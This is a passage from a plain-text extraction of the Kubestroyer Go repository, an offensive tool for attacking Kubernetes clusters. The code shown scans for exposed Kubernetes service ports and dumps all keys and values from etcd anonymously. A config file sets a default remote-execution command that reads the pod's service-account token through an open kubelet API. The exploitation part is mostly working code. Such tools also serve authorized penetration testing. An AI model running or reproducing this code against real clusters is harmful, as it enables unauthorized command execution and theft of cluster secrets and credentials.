if err != nil {
fmt.Println(err)
return
}
defer res.Body.Close()
body, err := io.ReadAll(res.Body)
if err != nil {
fmt.Println(err)
return
}
if body != nil && !strings.Contains(string(body), "failed") {
found = true
fmt.Println(string(body))
break
}
}
if found {
break
}
}
}
fmt.Println(utils.Split)
}
func readEtcdObjects(target string) {
loggerConfig := zap.Config{
Level: zap.NewAtomicLevelAt(zapcore.ErrorLevel),
Development: false,
DisableCaller: true,
DisableStacktrace: true,
Encoding: "json",
EncoderConfig: zapcore.EncoderConfig{
TimeKey: "ts",
LevelKey: "level",
NameKey: "logger",
MessageKey: "msg",
StacktraceKey: "stacktrace",
LineEnding: zapcore.DefaultLineEnding,
EncodeLevel: zapcore.LowercaseLevelEncoder,
EncodeTime: zapcore.EpochMillisTimeEncoder,
EncodeDuration: zapcore.SecondsDurationEncoder,
},
OutputPaths: []string{"stdout"},
ErrorOutputPaths: []string{"stderr"},
}
logger, err := loggerConfig.Build()
if err != nil {
fmt.Printf("Error setting up logger: %v", err)
return
}
zap.ReplaceGlobals(logger)
cli, err := clientv3.New(clientv3.Config{
Endpoints: []string{target + ":2379"},
DialTimeout: 5 * time.Second,
Logger: logger,
})
if err != nil {
if errStatus, ok := status.FromError(err); ok && errStatus.Code() == codes.Unavailable {
fmt.Println("Cannot connect to etcd: the server might be down or misconfigured")
} else {
fmt.Printf("Failed to connect to etcd: %v\n", err)
}
return
}
defer cli.Close()
ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
defer cancel()
resp, err := cli.Get(ctx, "/", clientv3.WithKeysOnly(), clientv3.WithPrefix())
if err != nil {
if errors.Is(err, context.Canceled) {
fmt.Println("Context canceled")
} else if errors.Is(err, context.DeadlineExceeded) {
fmt.Println("Operation timed out")
} else {
fmt.Printf("Failed to retrieve keys: %v\n", err)
}
return
}
var objects []string
for _, data := range resp.Kvs {
objects = append(objects, string(data.Key))
}
if len(objects) == 0 {
fmt.Println("No objects found in Etcd")
return
}
selectedObjects := surveyResult(objects, "Select objects to print:")
for _, selected := range selectedObjects {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
resp, err := cli.Get(ctx, selected)
cancel()
if err != nil {
fmt.Printf("Error fetching value for %s: %v\n", selected, err)
continue
}
fmt.Printf("Value for %s:\n %s\n", selected, resp.Kvs[0].Value)
}
fmt.Println(utils.Split)
}
================================================
FILE: pkg/scanning.go
================================================
package pkg
import (
"crypto/tls"
"fmt"
"net"
"net/http"
"strconv"
"strings"
"time"
"github.com/Rolix44/Kubestroyer/utils"
)
var openPort []int
func nodeportScan(target string, port int) {
d := net.Dialer{Timeout: 5}
servAddr := target + ":" + strconv.Itoa(port)
_, err := d.Dial("tcp", servAddr)
if err != nil {
return
}
openPort = append(openPort, port)
}
func sendHttpRequest(target string, port int, endpoint string) {
http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
client := http.Client{
Timeout: 3 * time.Second,
}
resp, err := client.Get(target + ":" + strconv.Itoa(port) + endpoint)
if err == nil {
openPort = append(openPort, port)
defer resp.Body.Close()
}
}
func checkPorts(target string) {
fmt.Printf("Starting port scan for '%s'... \n\n", target)
openPort = nil
if utils.ScanNode {
for port := 30000; port <= 32767; port++ {
nodeportScan(target, port)
}
}
target = "http://" + target
endpoint := "/"
for port := range utils.KnownPorts {
if port == 10250 || port == 443 {
target := strings.Replace(target, "http", "https", 1)
if port == 10250 {
endpoint = "/metrics"
}
sendHttpRequest(target, port, endpoint)
endpoint = "/"
} else {
sendHttpRequest(target, port, endpoint)
}
}
if len(openPort) != 0 {
for _, port := range openPort {
fmt.Println("\x1b[1;32m[+]\x1b[0m port " + strconv.Itoa(port) + " open (" + utils.KnownPorts[port] + ")")
}
} else {
fmt.Println("\x1b[1;31mNo open ports found !\x1b[0m")
}
fmt.Println(utils.Split)
}
================================================
FILE: utils/config.go
================================================
package utils
import (
"github.com/pborman/getopt/v2"
)
type RunningPods struct {
Kind string `json:"kind"`
APIVersion string `json:"apiVersion"`
Metadata struct {
} `json:"metadata"`
Items []struct {
Metadata struct {
Name string `json:"name"`
Namespace string `json:"namespace"`
UID string `json:"uid"`
CreationTimestamp interface{} `json:"creationTimestamp"`
} `json:"metadata"`
Spec struct {
Containers []struct {
Name string `json:"name"`
Image string `json:"image"`
Resources struct {
} `json:"resources"`
} `json:"containers"`
} `json:"spec"`
Status struct {
} `json:"status"`
} `json:"items"`
}
var Target string
var Targets []string
var AnonRce = false
var RceCommand = "cat /var/run/secrets/kubernetes.io/serviceaccount/token"
var ScanNode = false
var ScanEtcd = false
func Config() {
getopt.FlagLong(&Target, "target", 't', "Target (IP, domain or file)").Mandatory()
getopt.FlagLong(&ScanNode, "node-scan", 0, "Enable/disable node port scan").SetOptional()
getopt.FlagLong(&AnonRce, "anon-rce", 0, "Try to RCE if kubelet API is open").SetOptional()
getopt.Flag(&RceCommand, 'x', "Command to execute when using RCE")
getopt.FlagLong(&ScanEtcd, "etcd", 0, "Try Etcd anonymous read").SetOptional()
getopt.Parse()
}
================================================
FILE: utils/display.go
================================================
package utils
var Toolname string = `
_ __ _ _
| | / / | | | |
| |/ / _ _| |__ ___ ___| |_ _ __ ___ _ _ ___ _ __
| \| | | | '_ \ / _ \/ __| __| '__/ _ \| | | |/ _ \ '__| v0.3.0
| |\ \ |_| | |_) | __/\__ \ |_| | | (_) | |_| | __/ |
\_| \_/\__,_|_.__/ \___||___/\__|_| \___/ \__, |\___|_|
__/ |
|___/ `
var Author = ` By Rolix`
var Split = `
--------------------------------------------------------`
================================================
FILE: utils/ports.go
================================================
package utils
func init() {
addKnownServicePort()
}
var KnownPorts = map[int]string{
443: "Kubernetes API port",
2379: "Etcd",
6666: "Etcd",
4194: "cAdvisor for containers metrics",
6443: "Kubernetes API port",
8443: "Minikube API port",
8080: "Insecure API port",
10250: "Kubelet API anonymous port",
10255: "Kubelet API read only",
10256: "Kube proxy health check server",
9099: "Calico health check server",
6782: "Weave metrics/endpoints",
6783: "Weave metrics/endpoints",
6784: "Weave metrics/endpoints",
44134: "Tiller service listening",
}
func addKnownServicePort() {
for port := 30000; port <= 32767; port++ {
KnownPorts[port] = "Possible NodePort service"
}
}
gitextract_ggafct49/
├── .gitignore
├── LICENSE.txt
├── README.md
├── cmd/
│ └── kubestroyer/
│ └── main.go
├── go.mod
├── go.sum
├── pkg/
│ ├── cmd.go
│ ├── expoit.go
│ └── scanning.go
└── utils/
├── config.go
├── display.go
└── ports.go
SYMBOL INDEX (13 symbols across 6 files)
FILE: cmd/kubestroyer/main.go
function main (line 10) | func main() {
FILE: pkg/cmd.go
function Execute (line 12) | func Execute() {
FILE: pkg/expoit.go
function surveyResult (line 24) | func surveyResult(input []string, message string) []string {
function parsePod (line 38) | func parsePod(target string) *utils.RunningPods {
function anonRce (line 69) | func anonRce(target string) {
function readEtcdObjects (line 141) | func readEtcdObjects(target string) {
FILE: pkg/scanning.go
function nodeportScan (line 17) | func nodeportScan(target string, port int) {
function sendHttpRequest (line 28) | func sendHttpRequest(target string, port int, endpoint string) {
function checkPorts (line 40) | func checkPorts(target string) {
FILE: utils/config.go
type RunningPods (line 7) | type RunningPods struct
function Config (line 39) | func Config() {
FILE: utils/ports.go
function init (line 3) | func init() {
function addKnownServicePort (line 25) | func addKnownServicePort() {
Condensed preview — 12 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (35K chars).
[
{
"path": ".gitignore",
"chars": 5,
"preview": ".idea"
},
{
"path": "LICENSE.txt",
"chars": 1062,
"preview": "MIT License\n\nCopyright (c) 2023 Rolix\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof t"
},
{
"path": "README.md",
"chars": 8195,
"preview": "<!-- Improved compatibility of back to top link: See: https://github.com/othneildrew/Best-README-Template/pull/73 -->\n<a"
},
{
"path": "cmd/kubestroyer/main.go",
"chars": 271,
"preview": "package main\n\nimport (\n\t\"fmt\"\n\n\t\"github.com/Rolix44/Kubestroyer/pkg\"\n\t\"github.com/Rolix44/Kubestroyer/utils\"\n)\n\nfunc mai"
},
{
"path": "go.mod",
"chars": 1291,
"preview": "module github.com/Rolix44/Kubestroyer\n\ngo 1.19\n\nrequire (\n\tgithub.com/AlecAivazis/survey/v2 v2.3.7\n\tgithub.com/pborman/g"
},
{
"path": "go.sum",
"chars": 10877,
"preview": "github.com/AlecAivazis/survey/v2 v2.3.7 h1:6I/u8FvytdGsgonrYsVn2t8t4QiRnh6QSTqkkhIiSjQ=\ngithub.com/AlecAivazis/survey/v2"
},
{
"path": "pkg/cmd.go",
"chars": 704,
"preview": "package pkg\n\nimport (\n\t\"bufio\"\n\t\"log\"\n\t\"os\"\n\t\"strings\"\n\n\t\"github.com/Rolix44/Kubestroyer/utils\"\n)\n\nfunc Execute() {\n\n\t_,"
},
{
"path": "pkg/expoit.go",
"chars": 5487,
"preview": "package pkg\n\nimport (\n\t\"context\"\n\t\"crypto/tls\"\n\t\"encoding/json\"\n\t\"errors\"\n\t\"fmt\"\n\t\"github.com/AlecAivazis/survey/v2\"\n\tcl"
},
{
"path": "pkg/scanning.go",
"chars": 1590,
"preview": "package pkg\n\nimport (\n\t\"crypto/tls\"\n\t\"fmt\"\n\t\"net\"\n\t\"net/http\"\n\t\"strconv\"\n\t\"strings\"\n\t\"time\"\n\n\t\"github.com/Rolix44/Kubest"
},
{
"path": "utils/config.go",
"chars": 1355,
"preview": "package utils\n\nimport (\n\t\"github.com/pborman/getopt/v2\"\n)\n\ntype RunningPods struct {\n\tKind string `json:\"kind\"`\n\tA"
},
{
"path": "utils/display.go",
"chars": 640,
"preview": "package utils\n\nvar Toolname string = `\n _ __ _ _ \n| | / / | | "
},
{
"path": "utils/ports.go",
"chars": 705,
"preview": "package utils\n\nfunc init() {\n\taddKnownServicePort()\n}\n\nvar KnownPorts = map[int]string{\n\t443: \"Kubernetes API port\",\n\t"
}
]
About this extraction
This page contains the full source code of the Rolix44/Kubestroyer GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 12 files (31.4 KB), approximately 12.3k tokens, and a symbol index with 13 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.